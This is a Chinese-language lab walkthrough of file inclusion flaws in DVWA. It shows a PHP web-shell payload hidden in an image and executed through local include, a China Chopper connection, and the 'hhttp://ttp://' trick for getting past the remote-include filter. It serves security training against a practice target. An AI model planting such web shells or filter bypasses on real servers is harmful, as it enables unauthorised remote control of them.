OWASP-文件包含漏洞

文件包含漏洞是由于对包含文件的判断不严格造成的,现在验证漏洞:

打开靶机,进入dvwa,安全选择中级

查看源码,

发现只对包含文件的url地址作了操作

local file include方式:

使用edjpgcom软件给图片写入恶意代码,通过include包含方式执行图片,生成木马文件,最后通过菜刀连接

准备一张图片,通过拖动图片到edjpgcom上的方式打开edjpgcom,写入恶意代码

<?fputs(fopen("shell1.php","w"),'<?php eval($_POST[123]);?>')?>

通过文件上传到web,

访问图片,发现可以访问

把图片路径复制到包含文件的位置

文件被成功执行

访问生成的文件shell1.php,发现没有报错,说明生成成功

使用中国菜刀连接

连接成功!

 

remote file include:

在另外一台服务器上制作木马文件,通过include方式执行该文件生成本地木马文件

分析源码发现替换了http://部分

可以在http://里面再写一个http://

如:hhttp://ttp:// 通过replace替换之后得到http://,就可以正常访问远程文件

把等级设置为h,再查看源码

发现判断方式变成了指定文件名称,相对安全。